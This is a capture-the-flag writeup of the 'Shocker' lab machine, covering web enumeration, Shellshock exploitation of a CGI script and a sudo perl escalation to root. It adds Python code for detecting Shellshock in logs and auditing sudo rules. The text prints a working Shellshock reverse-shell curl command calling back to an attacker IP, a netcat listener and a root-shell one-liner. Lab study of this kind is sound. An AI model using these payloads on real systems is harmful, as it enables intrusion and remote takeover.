# Shocker Writeup

![](/files/-MapCqoBJ90mprNKt4Tx)

## Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (**-Pn**):

```bash
nmap -Pn 10.10.10.56
```

![](/files/-MapDq8DlLce-bWTPW0l)

Detailed Nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default Nmap scripts
* **-p**: specifying ports 80 and 2222
* **-oN nmap**: saving the output to a file called nmap

```bash
nmap -sC -sV -p 80,2222 -oN nmap 10.10.10.56
```

![](/files/-MapE7konLITt0NWYZpH)

## Enumeration

Let's visit the website.

![](/files/-MapFX3N2xZ6g8Ab2TFQ)

It is just a few words and an image, and there is nothing of interest in the source code, so let's use Gobuster to find hidden directories on the web server.

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56
```

We only got one directory, and we did not have access to it. After thinking for a while, I considered why the machine is named "Shocker": the only port left for us to enumerate was port 80, a web server, so I went to Google and searched for something along the lines of "Shocker website vulnerabilities", and found the vulnerability known as "Shellshock". Further research told me that this vulnerability affects web servers that use CGI (Common Gateway Interface), a mechanism for generating dynamic web content. When thinking of CGI, we usually see directories like /cgi-bin and /cgi-sys, so I searched for directories like that.

![](/files/-MapHn2_NO1SHIuAPEkb)

That gave a not found error. Then, looking at the next tab, I thought: why don't I add a trailing slash to the URL and see what it does? To my surprise, it gave me a 403 Forbidden error, which means the directory is present but we are not allowed to access it. Now I was curious whether appending "/" to every directory Gobuster searched for would give different results, like this experiment did. (**-f**) adds "/" to the end of every directory it tries.

![](/files/-MapIwticplL3JIkENTe)

We were not allowed to access "icons", so let's try searching for directories or files in /cgi-bin/ with some common extensions. (**-x**) specifies the extensions to try.

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -f -x php,html,txt,sh
```

![](/files/-MapJytpLlCV6xbjyEiF)

Looks like we found a file; let's go check what it contains.

![](/files/-MapKBw9YFp81n3fFj9m)

When visiting the page, we are given the option of downloading the file.

![](/files/-MapKg2xGYr8Rq_t2m19)

## Exploitation

Now we do not have any other information except this bash script, and it also has "Content-Type: text/plain", which is interesting. What is the number one tool for web exploitation? Burp Suite, so let's check it out there: I captured the request to the script and sent it to Repeater.

![](/files/-MapMRMplTmRZJ8uDJhi)

Now we know from our enumeration that this is vulnerable to Shellshock, so I went to Google, searched it up and found an [article](https://ethicalhackingguru.com/how-to-exploit-the-shellshock-vulnerability/) showing how to make the web server send a reverse shell back to our machine, so I tried that.

We use "curl", a tool for sending web requests to a web server from the terminal.

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh
```

And also start a Netcat listener:

```bash
nc -lvnp 1234
```

When you hit enter on the curl command, you get a reverse shell, but as a low-privilege user.

![](/files/-MapP6yF3odWDLsDoMI0)
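To show what the curl request above actually reaches on the server, and how a defender would spot it afterwards, here is an added Python example that is not part of the original writeup. It applies the CGI header-to-environment mapping the Enumeration section relies on (User-Agent becomes HTTP_USER_AGENT), flags any header value carrying the "() {" function-definition prefix that Shellshock depends on, and runs the same check over constructed Apache combined-format access log lines. The log lines, timestamps, sizes and curl version are made up for the example; the flagged request mirrors the command used in this writeup.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# How the bug is reached: Apache's CGI module exports every request header as an
# environment variable (User-Agent -> HTTP_USER_AGENT, per the CGI spec), and a
# vulnerable bash imported any variable whose value started with "() {" as a
# function definition, then kept parsing past the closing brace and executed
# whatever followed. The detector therefore looks for that prefix in header values.
# The pattern is looser than bash's exact "() {" check so whitespace variants are caught too.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def cgi_env_name(header: str) -> str:
    """Translate an HTTP header name into the CGI environment variable a script would see."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def find_shellshock_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Return {env_var: value} for each header whose value carries a function-definition prefix."""
    return {cgi_env_name(name): value
            for name, value in headers.items()
            if SHELLSHOCK_RE.search(value)}


# Apache "combined" log format; only the Referer and User-Agent header values are
# logged, so this catches the usual delivery headers but not a payload in, say, Cookie.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


@dataclass
class Hit:
    ip: str
    path: str
    field: str   # which logged header carried the prefix: "referer" or "agent"
    value: str


def scan_access_log(lines: List[str]) -> List[Hit]:
    """Flag log entries whose Referer or User-Agent contains a Shellshock prefix."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        for field in ("referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append(Hit(m.group("ip"), path, field, m.group(field)))
    return hits


# Constructed sample: a normal fetch of the script, the request produced by this
# writeup's curl command, and an unrelated page view. Timestamps and sizes are made up.
SAMPLE_LOG = [
    '10.10.14.19 - - [10/Oct/2021:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
    '10.10.14.19 - - [10/Oct/2021:12:00:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" '
    '"() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1"',
    '10.10.14.19 - - [10/Oct/2021:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit.ip} -> {hit.path}: Shellshock prefix in {hit.field}: {hit.value!r}")
```

The log scan is a triage aid, not a fix: the default combined format records only Referer and User-Agent, so a prefix delivered in another header would need request-level inspection (a WAF rule or a custom LogFormat that records that header), and the actual remediation is a patched bash together with not exposing CGI scripts that need no exposure.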

## Privilege Escalation

Let's run "sudo -l" to see what we can run as root.

![](/files/-MapPgTnnh8PPHjmaqxE)

Looks like we can run /usr/bin/perl as root without a password, so let's go to [GTFOBins](https://gtfobins.github.io/gtfobins/perl/#sudo) and find the command that lets us escalate privileges to root. The command is:

```bash
sudo perl -e 'exec "/bin/sh";'
```

![](/files/-MapQFRXq3sk1f2PGYxM)

And we are root!
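As an added example (not from the writeup), here is a Python audit of `sudo -l` output that flags the kind of rule found on this box: a password-less sudo entry for a program that can hand back a shell. The rule parser, the SHELL_CAPABLE list and the sample output (with placeholder user and host names) are this example's own constructions, seeded from the GTFOBins categories the writeup links to, and the list is a starting point rather than a complete one.

```python
import re
from typing import Dict, List, Tuple

# Binaries that can start a shell or run arbitrary code when executed as root, the
# class of entries GTFOBins documents. Constructed starter list for this example,
# not an exhaustive one; extend it from GTFOBins for real audits.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash",
    "vim", "vi", "nano", "less", "more", "awk", "find", "env", "ftp",
}

# One rule line from "sudo -l" output, e.g. "    (root) NOPASSWD: /usr/bin/perl".
# Tags such as NOPASSWD: or SETENV: may precede the comma-separated command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> List[Dict]:
    """Extract runas, tags and commands from each rule line of `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines like "User X may run..." carry no rule
        tags = [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "commands": cmds})
    return rules


def risky_rules(rules: List[Dict]) -> List[Tuple[str, str]]:
    """Return (runas, command) pairs that grant a shell-capable program without a password."""
    findings = []
    for rule in rules:
        if "NOPASSWD" not in rule["tags"]:
            continue
        for cmd in rule["commands"]:
            if cmd == "ALL":
                findings.append((rule["runas"], cmd))
                continue
            # Compare on the basename so /usr/bin/perl and /usr/local/bin/perl both match.
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                findings.append((rule["runas"], cmd))
    return findings


# Constructed sample modelled on what this writeup found; user and host names are placeholders.
SAMPLE_SUDO_L = """Matching Defaults entries for lowpriv on shocker:
    env_reset, mail_badpass

User lowpriv may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get, /bin/cat /var/log/apache2/access.log
"""

if __name__ == "__main__":
    for runas, cmd in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"password-less {cmd} as {runas}: can spawn a root shell")
```

The second sample rule is deliberately left unflagged because it still requires the user's password; the finding that matters for this box is the `NOPASSWD` perl entry, which is exactly the condition the GTFOBins one-liner above exploits. The remediation is to drop the entry or restrict it to a fixed script with arguments, since any interpreter run as root is equivalent to granting root.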
